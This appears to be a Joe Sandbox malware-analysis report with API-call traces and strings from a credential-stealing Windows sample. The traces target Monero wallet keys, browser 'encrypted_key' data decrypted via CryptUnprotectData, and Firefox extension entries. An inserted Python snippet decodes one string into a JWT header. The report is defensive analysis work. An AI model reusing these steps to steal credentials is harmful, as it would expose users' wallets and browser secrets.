                            • Opcode ID: a503b41167eabcec084f419f77911b2b7f997a948487a2049dc469897329b8ef
                            • Instruction ID: fdafc9847205e704d93a3106addc794f2038b6092816a6062b4930509daa4656
                            • Opcode Fuzzy Hash: a503b41167eabcec084f419f77911b2b7f997a948487a2049dc469897329b8ef
                            • Instruction Fuzzy Hash: D641B271C106089ADB1AEBA0C892FDDBB74BF14301F404119E916BA1A5EF746A4EEF91
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00349F41
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: a43ebf237933e90fd5b27927101d8861a407174059ccec8c98d82a9840674c28
                            • Instruction ID: 1c768fd37a90edb81bc1f085ad5e195f7fe788891696038b1941b971aaed626d
                            • Opcode Fuzzy Hash: a43ebf237933e90fd5b27927101d8861a407174059ccec8c98d82a9840674c28
                            • Instruction Fuzzy Hash: 1B615070A10648EFDB25EFA4CC96FEE77B9AF44300F008118F90A5F195EB706A49DB52
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00FBDD40,00000000,00020119,?), ref: 003540F4
                            • RegQueryValueExA.ADVAPI32(?,00FBE268,00000000,00000000,00000000,000000FF), ref: 00354118
                            • RegCloseKey.ADVAPI32(?), ref: 00354122
                            • lstrcat.KERNEL32(?,00000000), ref: 00354147
                            • lstrcat.KERNEL32(?,00FBE280), ref: 0035415B
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: b65a029a860e1c3caefa1cc27068e4cbd3341ba6a3ae39cf8d915cd442541485
                            • Instruction ID: 660817587544a4cfa4a1c82c69960a6a0fe0a2e9683cdc74fb0cf50b39effc6c
                            • Opcode Fuzzy Hash: b65a029a860e1c3caefa1cc27068e4cbd3341ba6a3ae39cf8d915cd442541485
                            • Instruction Fuzzy Hash: 8041CCB6D001086BEB15EBA0DC46FFD737DA798300F004559BF156B191EA755B8C8BD2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,00FAC380,00000000,00020119,?), ref: 00357E5E
                            • RegQueryValueExA.ADVAPI32(?,00FBDB40,00000000,00000000,000000FF,000000FF), ref: 00357E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00357E92
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
                            • Instruction ID: 38aa2d2837a1247cfd1439d7271eefffb1cf5691b50c57322996df3599613793
                            • Opcode Fuzzy Hash: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
                            • Instruction Fuzzy Hash: 04115EB1A44205EBEB14CF94ED4AFBBBBBCEB04B11F10415AFE05B7690D77458089BA1
                            APIs
                            • StrStrA.SHLWAPI(00FBDFF8,?,?,?,0035140C,?,00FBDFF8,00000000), ref: 0035926C
                            • lstrcpyn.KERNEL32(0058AB88,00FBDFF8,00FBDFF8,?,0035140C,?,00FBDFF8), ref: 00359290
                            • lstrlen.KERNEL32(?,?,0035140C,?,00FBDFF8), ref: 003592A7
                            • wsprintfA.USER32 ref: 003592C7
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: dca9c0b5466907e77fcf895fb58021ccea2c26737915cea6ed69f37a49dc8115
                            • Instruction ID: f6db61dc3d8a2ece464cc997520428bd8c82e72d4e2ff1ef0666c3f41e4dbfac
                            • Opcode Fuzzy Hash: dca9c0b5466907e77fcf895fb58021ccea2c26737915cea6ed69f37a49dc8115
                            • Instruction Fuzzy Hash: 3D01E575500208FFDB04DFE8C989EAE7BB9EB48391F108549FD09AB204C631EA44EB91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003412D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
                            • RegCloseKey.ADVAPI32(?), ref: 003412FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
                            • Instruction ID: 39670efc6b9468fc9d4759eb28d16fd2ec416dac2ccdaf0acbdafa9cebdac5c4
                            • Opcode Fuzzy Hash: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
                            • Instruction Fuzzy Hash: 8B0136B5A40208BBEB00DFD0DC49FAEB7B8EB48701F008155FE05E7280D6749A059F51
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 15b52129ad3847ab00921acf5019cdac7094c9b5baf5b56be55f59ac9ad12bde
                            • Instruction ID: cc2188a9b85956695fbb5e2d0762e505801a414b56f0e78ac613a7ed2ca26987
                            • Opcode Fuzzy Hash: 15b52129ad3847ab00921acf5019cdac7094c9b5baf5b56be55f59ac9ad12bde
                            • Instruction Fuzzy Hash: 3A41E4B151079C5EDB228B24CC84FFBBBFCAB45709F1454A8ED8A86192D3719A49CF60
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00356663
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00356726
                            • ExitProcess.KERNEL32 ref: 00356755
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 33cf4cd9a0d7230bb50784e71f3e0c8dead8954733c9da6839fe5248f4c282dc
                            • Instruction ID: aa5b2399b5fcf14c51f92634918ddb681e8063c609904406c604767d67c52a22
                            • Opcode Fuzzy Hash: 33cf4cd9a0d7230bb50784e71f3e0c8dead8954733c9da6839fe5248f4c282dc
                            • Instruction Fuzzy Hash: CC314CB1801218ABDB15EB90DC82FDEBB78AF14301F405189FA097A1A1DF746B4DDF66
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E28,00000000,?), ref: 0035882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00358836
                            • wsprintfA.USER32 ref: 00358850
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: dc430518abbfaed286239373312ad90ebce21f070869f8b2265863853d0811ac
                            • Instruction ID: 5ba2b5ea4530323496509f912a720b1dfecd6a4e722db1f58b0cc3ef1e0db129
                            • Opcode Fuzzy Hash: dc430518abbfaed286239373312ad90ebce21f070869f8b2265863853d0811ac
                            • Instruction Fuzzy Hash: 3C2130B1A40204AFEB04DFD4DD49FAEBBB8FB48701F104119FA05B7294C77999049FA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0035951E,00000000), ref: 00358D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00358D62
                            • wsprintfW.USER32 ref: 00358D78
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: e8751c2a95b169f4046c2bb5ca64522aa47ef8cb052cb9edaefe606f34025025
                            • Instruction ID: 064bd42ce3ca9b20cf003d0ccd7fe215ef031efe5cf8a0bf27fe6bff5430d769
                            • Opcode Fuzzy Hash: e8751c2a95b169f4046c2bb5ca64522aa47ef8cb052cb9edaefe606f34025025
                            • Instruction Fuzzy Hash: A5E0ECB5A40208BBE714DB94DD0AE6977B8EB54702F004195FE09A7280DA719E14AFA6
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0034A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0034A6BC
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0034A743
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 6b2d901d348f9c691f919560d0af21352d378de0a232e590c32b261f646888bd
                            • Instruction ID: 5ac4cf1df55c54c7ab0e750f2977da6f910d2d9658ef3d2b9518c3554e56dcc2
                            • Opcode Fuzzy Hash: 6b2d901d348f9c691f919560d0af21352d378de0a232e590c32b261f646888bd
                            • Instruction Fuzzy Hash: C1E1E6728105189ADB06FBA4DC92DEE7738BF14301F508259F9177A0A1EF346A4DEB62
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D481
                            • lstrlen.KERNEL32(00000000), ref: 0034D698
                            • lstrlen.KERNEL32(00000000), ref: 0034D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0034D72B
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 2453f77522e816bf7c4cef24ba30956b26fe065f130677325ee6004f8dc333cb
                            • Instruction ID: a99f01e393818aab28a38fb7aec43687f8a62048e02c8a4a4dc01fc6b5530bad
                            • Opcode Fuzzy Hash: 2453f77522e816bf7c4cef24ba30956b26fe065f130677325ee6004f8dc333cb
                            • Instruction Fuzzy Hash: 5A9103729105189BDB06FBA4DC96DEE7738BF14301F504259F907BA0A1EF346A0DEB62
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D801
                            • lstrlen.KERNEL32(00000000), ref: 0034D99F
                            • lstrlen.KERNEL32(00000000), ref: 0034D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0034DA32
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 548faa1e2596d57580feec33602671945b1f69d3f6c2b857045b0c6420592a86
                            • Instruction ID: e9c4341c507bc5c08a4f93dd15eb198634b6f3592e4209d6f61663d46d8803e5
                            • Opcode Fuzzy Hash: 548faa1e2596d57580feec33602671945b1f69d3f6c2b857045b0c6420592a86
                            • Instruction Fuzzy Hash: EB8100729105189ADB06FBA4DC96DEE7738BF14301F504219F907BA0A1EF346A0DEB62
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00361580,00360D92), ref: 0034F54C
                            • lstrlen.KERNEL32(00000000), ref: 0034F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 62375df1ab717f10dc45f1a4694310d7e8f1bc06b19b6d83348243c8b08f021c
                            • Instruction ID: 36dbaebc4388520166b3d2fccbfa92e985a396b84f61e4612c04282aacb8730c
                            • Opcode Fuzzy Hash: 62375df1ab717f10dc45f1a4694310d7e8f1bc06b19b6d83348243c8b08f021c
                            • Instruction Fuzzy Hash: 0D512471D106089ADB05FBB0DC56DED7778AF54301F408628FC16AB1A1EF346A0DEBA2
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0035718C
                            • s5, xrefs: 003572AE, 00357179, 0035717C
                            • s5, xrefs: 00357111
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s5$s5$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-867831089
                            • Opcode ID: 3d26d83006396b936540a1ae8c6f2d7a91f59e4b1c7b280dc3ff86739d2b2d2e
                            • Instruction ID: 215a41185d55fc525ecd6fc287644813186cfd3696f01fd809ca39f81b234322
                            • Opcode Fuzzy Hash: 3d26d83006396b936540a1ae8c6f2d7a91f59e4b1c7b280dc3ff86739d2b2d2e
                            • Instruction Fuzzy Hash: EE5190B0C042089BDB25EB90DC86FEEB774AF44305F1045A8EA067B1A1EB746E8CDF55
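The Strings entry at xref 0035718C above is a hex dump of a 43-character ASCII string rather than something readable. The Python below is an added example for reading that entry, not code from the sample or from Joe Sandbox: it reverses the hex dump, restores the padding that the string lacks (JWT segments are base64url without "=" padding, which is why the url-safe decoder is used), and parses the result. Only the hex string is taken from the report; the function names are mine.

```python
"""Decode the hex-dumped string shown at xref 0035718C in the report above.

Added example for reading the report; not the sample's code. The only input
taken from the page is REPORT_HEX, copied verbatim from the Strings entry.
"""
import base64
import binascii
import json
from typing import Any, Dict, Optional

# Copied verbatim from the Strings entry (xref 0035718C).
REPORT_HEX = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A "
    "68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump (as the IDA plugin prints it) into raw bytes."""
    return binascii.unhexlify("".join(dump.split()))


def b64decode_lenient(token: str) -> bytes:
    """Base64-decode a token that may lack '=' padding.

    The url-safe decoder accepts both the standard and the base64url alphabet
    once the padding is restored, so JWT segments and ordinary base64 both work.
    """
    token = token.strip()
    padded = token + "=" * (-len(token) % 4)
    return base64.urlsafe_b64decode(padded)


def decode_report_string(dump: str) -> Dict[str, Any]:
    """Hex dump -> ASCII -> base64 -> JSON, keeping every intermediate stage.

    'json' is None when the decoded bytes are not a JSON document, so the
    function is safe to run over arbitrary hex-dumped strings from a report.
    """
    raw = hex_dump_to_bytes(dump)
    text = raw.decode("ascii")
    decoded = b64decode_lenient(text)
    parsed: Optional[Any]
    try:
        parsed = json.loads(decoded)
    except ValueError:
        parsed = None
    return {"ascii": text, "decoded": decoded, "json": parsed}


def looks_like_jose_header(obj: Any) -> bool:
    """True for an object shaped like a JOSE/JWT header: has 'alg' and typ == 'JWT'."""
    return isinstance(obj, dict) and "alg" in obj and obj.get("typ") == "JWT"


if __name__ == "__main__":
    result = decode_report_string(REPORT_HEX)
    print(result["ascii"])
    print(result["decoded"].decode("ascii"))
    print("JOSE header:", looks_like_jose_header(result["json"]))
```

On the report's string the pipeline yields `{ "typ": "JWT", "alg": "EdDSA" }`, that is, the sample carries the base64 form of an EdDSA JWT header as a search token. Which credential store that token is matched against is not shown in this part of the report, so the example stops at identifying the format.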
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 1564e527d9158e7899abf8dec5be71875e002c107f29281374247eec7dde0fd2
                            • Instruction ID: 1b2d65d924a23b1dacc5f048fff4cb12265ea72b591a5c8d6ec18772ff9c9f45
                            • Opcode Fuzzy Hash: 1564e527d9158e7899abf8dec5be71875e002c107f29281374247eec7dde0fd2
                            • Instruction Fuzzy Hash: E0416371D10108EBCB06EFE4D885EEE7778AF54305F008118E8167B260DB756A09DFA2
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
                              • Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
                              • Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F
                              • Part of subcall function 00349B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
                              • Part of subcall function 00349B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
                              • Part of subcall function 00349B60: LocalFree.KERNEL32(?), ref: 00349BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
